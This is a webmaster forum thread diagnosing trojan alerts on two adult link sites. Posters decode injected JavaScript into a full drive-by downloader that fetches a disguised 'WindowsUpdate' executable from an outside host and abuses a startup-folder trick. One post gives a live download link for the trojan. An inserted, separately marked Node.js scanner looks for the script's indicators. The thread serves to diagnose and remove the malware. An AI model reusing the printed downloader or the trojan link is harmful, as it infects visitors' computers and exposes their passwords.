Virus alerts on TGP's
I was submitting galleries today and noticed a Trojan virus detected when loading both the main pages on pornno.com and snakesworld.com. I consider my computer pretty secure. Anyone else noticing this?
|
Haven't noticed... and I'm not going to go looking for them :glugglug
|
hehe - only wondering because I already have done a few spyware scans and nothing was detected so I believe it's not on my pc
|
What spyware programs are you using?.. all those free ones do not completely remove them.. I have them all and they do find most but not all of them.. BTW I looked and didn't get any warnings, I'm guessing it's on your box
|
I use Ad-Aware and Spybot, I just had a friend visit the sites and got the same virus alerts... I guess you would need Norton to see them
|
yeah whenever i go out to find more TGPs to submit to, that usually happens. sucks
|
It took a minute but I did get a warning on snakesworld...I have norton as well...maybe he doesn't know he has it
|
they are both hosted by candid..... hmmmm
|
just use firefox to solve those problems at the source.
|
yep i get em too :BangBang:
|
Hey, you shouldn't be getting any virus alerts. I think you may be infected with some shit. I don't get the warnings and I'm using Norton also.
Did you check your system for "snakesworld" or "pornno"? Also, run CWShredder and see what happens. Get it here http://www.spywareinfo.com/~merijn/downloads.html If you can't get to this page you're infected. If you can, download CWShredder and let me know what happens. If you get the same shit, I'll dig some more.
Thanks, Snake |
I have had this problem! Some TGPs have viruses and spyware on the webmaster page (submission page)! Install some antivirus, spyware remover and firewall!
|
Yes, Cosis, you are right.
And pornno.com and snakesworld.com install the same Trojan.DownLoader version from rockyspornpalace.com
The first downloaded file name is WindowsUpdate[random number].exe
Here is the javascript line which creates the URL:
    burl="http://www.rockyspornpalace.com/ad/banners/29406/82404/WindowsUpdate"+(Math.random()+" ").substr(2,5)+".exe";
beemk, snakesworld has it at the bottom of the page but above the </BODY> tag, pornno has it at the beginning of the Asians section, so I doubt the host can do it. I do not think they are hackers of course, looks like they do it for money.
thurbs, you are right, here is the function from the snakesworld/pornno trojan downloader which decides whether to download the trojan or not:
    function BadBrowser() {
      if(navigator.appName!="Microsoft Internet Explorer") return 1;   // not IE: skip
      if(!navigator.cookieEnabled) return 1;                           // cookies disabled: skip
      if(navigator.platform!="Win32") return 1;                        // not Windows: skip
      if(navigator.userAgent.indexOf("MSIE 5.5")==-1 && navigator.userAgent.indexOf("MSIE 6.")==-1) return 1;   // neither IE 5.5 nor IE 6: skip
      if(document.cookie.indexOf("msip=6x")>-1) return 1;              // marker cookie already set: skip
    }
Snake, if your site IP is not 64.158.30.220 check your nameserver. |
yes i get that shit all the time pretty annoying never gets past the scanner though
|
I get the alert when I go to snakesworld as well.
|
Anyone know what these trojans do? Turn machines into spam boxes?
|
mGreg,
as the name Trojan.DownLoader shows, this program does nothing itself, it just opens the door for ANY trojans. A zillion people scan the Net to find infected computers, then they install on your comp whatever they want, but first of all they download all your passwords. Read here: http://www.viruslibrary.com/virusinf...Downloader.htm |
I had some nasty shit installed while doing movie galleries. Don't remember what site it was, but it fucked my shit up for awhile. Just watch yourself, it's a crazy world out there man.
|
I'd like to see the source code you guys are seeing. I'm not doing this for money, who the fuck is Rocky's Porn Palace anyway?
I think your computers are infected, cause I see nothing on my end. I see nothing on the server or in the source or the page when I look at it, unless it's some of that new "invisible text".... Where on my page do you see the code? How long has this been happening? Do you think the js code for Nasty's Camcrush link could be hijacked? or just the cause of Norton alerts. I get nothing here on my end. The only thing I've changed is that link to Camcrush and now I'm getting complaints. Help me out here. Thanks Snake |
Clear your cookies (at least from snakesworld.com) and load your main page - then view source. You'll see a block of encoded javascript at the bottom, just beneath your copyright. I've done this twice to be sure - without clearing cookies, it happens once, then everything is fine. Clear the cookie, and it comes back the next time you load the page. I'd post the javascript here, but I don't know what would happen :-) |
Cleared cookies and don't see it. I think you have a virus in your machine. It's definitely not being done purposely on my end. Check my page again, I'll remove the js bullshit and let me know if it happens again.
thanks, Snake |
I no longer see it on your page, but if you look at pornno.com in the "Asians" section of the html you will see it. Have you re-uploaded your links.html file recently? That might be why it's not showing right now. http://www.teeneroticaclub.net/Capture.jpg |
I pulled this from links.html just a few minutes ago.
Hey - I know you are not doing it on purpose - just trying to help ya out :-) http://www.18pluspics.com/hotlink/snakes.jpg |
Snake, this code was found on snakesworld and pornno from many machines (mostly UNIX), so I doubt they all could be infected.
Please show us code you have between Copyright 1997-2004</FONT></FONT> </CENTER> and </BODY></HTML> We all see there encoded javascript. Here you can see this script decoded: var pop; var uploaded; var obj; var burl; var hiddenImg; var totalobj; function BadBrowser() { if(navigator.appName!="Microsoft Internet Explorer") return 1; if(!navigator.cookieEnabled) return 1; if(navigator.platform!="Win32") return 1; if(navigator.userAgent.indexOf("MSIE 5.5")hahahaha-1 && navigator.userAgent.indexOf("MSIE 6.")hahahaha-1) return 1; if(document.cookie.indexOf("msip=6x")>-1) return 1; } uploaded=BadBrowser(); if(!uploaded) { burl="http://www.rockyspornpalace.com/ad/banners/29406/82405/WindowsUpdate"+(Math.random()+" ").substr(2,5)+".exe"; } function initpop() { if(!pop) { pop=window.createPopup(); var oBody = pop.document.body; pop.document.bgColor="black"; oBody.style.border = "solid black 0px"; oBody.style.position="absolute"; oBody.style.left= "0"; oBody.style.top= "0"; var temp; temp='<DIV style="position:relative;"><a href="'+"#\" onBlur='parent.document.getElementById(\"i_frame\" ).style.visibility=\"hidden\"' "; temp+= "onMouseOut='document.getElementById(\"client\").s tyle.visibility=\"hidden\"' \ OnMouseOver='document.getElementById(\"client\").s tyle.visibility=\"visible\"' \ onMouseDown='parent.document.getElementById(\"i_fr ame\").style.visibility=\"visible\";parent.pop.sho w(1,1,1,1);parent.uploaded=1;parent.DoClick();'> \ I\ <DIV ID=\"client\" STYLE=\"visibility:hidden; position:absolute; top:-25; left:-25;\">\ <img nocache border=1 style=\"width=500px;heigth=500px; cursor:hand;\" dynsrc=\""+burl+"\" ></div></a></div>"; oBody.innerHTML=temp; } } function clean() { uploaded=1; if(pop) pop.hide(); } if(!uploaded) { initpop(); window.onbeforeunload=clean; } function DoClick() { document.cookie="msip=6x; path=/; expires=Mon, 31 Dec 2005 23:59:59 UTC;"; window.setTimeout('obj.click();',300); } function showpop() { if(uploaded) return; obj=window.event.srcElement; 
if(!pop) { initpop(); } pop.show(window.event.screenX,window.event.screenY ,1,1); document.getElementById("i_frame").style.left=wind ow.event.screenX-window.screenLeft-document.body.clientLeft+document.body.scrollLeft; document.getElementById("i_frame").style.top=windo w.event.screenY-window.screenTop-document.body.clientTop+document.body.scrollTop; } function SetAllEvents() { if(pop.document.readyStatehahahaha"complete" && totalobj!=document.all.length) { totalobj=document.all.length; for(i = 0; i < document.all.length; i++){ if(document.all(i).tagNamehahahaha"A" && document.all(i).id!="clientcall") document.all(i).onmousemove=showpop;} } setTimeout("SetAllEvents();", 400); } if(!uploaded) { setTimeout("SetAllEvents();", 400); window.setTimeout('window.defaultStatus=" "',2000); document.write('<div id=i_frame name=i_frame STYLE="visibility:hidden;position:absolute;top=0;l eft=0;width:1;height:1;overflow:hidden"><iframe frameborder="1" name="clientframe" id="clientframe" style="position:relative;top=-250;left=-440;width:700;height:700;"></iframe></div>'); document.write('<a folder="shell:startup" target="clientframe" id="clientcall" style="visibility:hidden;display:none;behavior:url (#default#AnchorClick);"></a>'); document.getElementById("clientcall").click(); document.write('<iframe src="about:blank" style="visibility:hidden;display:none;"></iframe>'); } |
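Added example, not part of the thread and not any poster's code: a Node.js scan of saved page source that reports script blocks sitting after the footer marker or containing indicator strings that appear in the decoded script quoted above. The sample pages, the `example.invalid` URL and the function names are constructed for illustration, and the `JScript.Encode` markers are an assumption about how the block was encoded.

```javascript
// Added example (Node.js, no dependencies): scan saved page source for the
// indicators visible in the decoded script quoted in this thread.
// Assumption: the JScript.Encode markers describe how the block was encoded.
const INDICATORS = [
  { id: "encoded-script", re: /language\s*=\s*["']?JScript\.Encode|#@~\^/i },
  { id: "startup-folder-anchor", re: /folder\s*=\s*\\?["']?shell:startup/i },
  { id: "anchorclick-behavior", re: /#default#AnchorClick/i },
  { id: "dynsrc-image", re: /\bdynsrc\s*=/i },
  { id: "exe-url-built-in-script", re: /WindowsUpdate["']?\s*\+[\s\S]{0,80}\.exe/i },
  { id: "gate-cookie", re: /msip=6x/ },
  { id: "ie-popup-object", re: /window\.createPopup\s*\(/i },
];

// Return every <script> block together with its offset in the document.
function scriptBlocks(html) {
  const out = [];
  const re = /<script\b[^>]*>[\s\S]*?<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push({ start: m.index, text: m[0] });
  return out;
}

// footerMarker is text the owner knows closes the real content (the thread
// uses the copyright line). Scripts after it are reported as "trailing".
function scanPage(html, footerMarker) {
  const footerAt = footerMarker ? html.lastIndexOf(footerMarker) : -1;
  return scriptBlocks(html)
    .map((b) => ({
      offset: b.start,
      trailing: footerAt !== -1 && b.start > footerAt,
      hits: INDICATORS.filter((i) => i.re.test(b.text)).map((i) => i.id),
    }))
    .filter((f) => f.trailing || f.hits.length > 0);
}

// Constructed samples (inert fragments, not the real pages).
const FOOTER = "Copyright 1997-2004";
const CLEAN = "<body><script>var n=1;</script><center>" + FOOTER + "</center></body>";
const ENCODED = "<body><center>" + FOOTER + "</center>" +
  '<script language="JScript.Encode">#@~^constructed</script></body>';
const DECODED = "<body><h2>Asians</h2><script>" +
  'if(document.cookie.indexOf("msip=6x")>-1){}' +
  'var u="http://example.invalid/WindowsUpdate"+(Math.random()+" ").substr(2,5)+".exe";' +
  "</script><center>" + FOOTER + "</center></body>";

for (const [name, html] of Object.entries({ CLEAN, ENCODED, DECODED })) {
  console.log(name, JSON.stringify(scanPage(html, FOOTER)));
}
```

Because the page was reported to look different from one request to the next, run the scan on source saved from a cookie-free request as well as on the file stored on the server.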
Germes,
There is no code on my pages between the area you mentioned. I think when I had the .js script on there for NastyDollars Cam site it was exploited by a js exploit. I'm not an expert but it seems to only affect certain machines. I see Pornno.com also runs a few .js scripts and I do see the jscript encode in his source, but not on my pages. Can you take a look in my archives where I only have the "Adult Friend Finder" link at the bottom http://www.snakesworld.com/oct1618.html and tell me if you see the same shit. If not, I think "Rocky" has a little explaining to do. BTW, I know you guys are trying to help and I appreciate it. |
Hello Shemp!
Sometimes I do not see it too. A few minutes later I see it from the same IP. Clean up cookies and try again. |
I just bit the bullet and loaded up rockyspornpalace.. nothing major, but massive popups...
|
It's gone now..:thumbsup
|
Snake,
page http://www.snakesworld.com/oct1618.html looks clean to me. If you do not have any code on the page, check the httpd.conf and .htaccess files. There are not too many ways to insert code |
I removed the .js from my page earlier, is anyone still seeing the jscript encode?
I emailed Pornno, but don't know if I have the right contact info, if anyone has it they should let him know what's up. Also, Shemp this is perplexing to me also, but what's worse is I may actually break 50 posts on GFY after all these years! |
If you can't see the code, and don't get the virus/trojan notification from Norton (assuming you do have Norton installed), try changing your IE settings to request a new copy of the page each visit, e.g. Tools->Internet Options->Temporary Internet Files-->Settings-->Every Visit
When I do this I get the code and the Norton popups every time I refresh the links.html page. |
spunky, no, it is back
fusionx, try to download http://www.rockyspornpalace.com/ad/banners/29406/82404/WindowsUpdate31327.exe but be careful, it is a trojan
Shemp, yes, cheaters are smart. BTW, gallery http://www.darkestelf.com/dp19t.htm on your TGP redirects to http://stats.yourownfreehost.com/redir.php?buyer_id=147&userid=cheyenne&is_u=0 |
Snake, I just visited your page and got 3 prompts from McAfee for trojans. I looked at your source and saw the code at the very bottom of your page. This is after your camcrush links were removed.
|
Sorry, Snake, but I still can see this code :(
|
Hmmm. Deleted cookies and went here... http://www.snakesworld.com/links.html
...seemed fine here, no trojan warnings |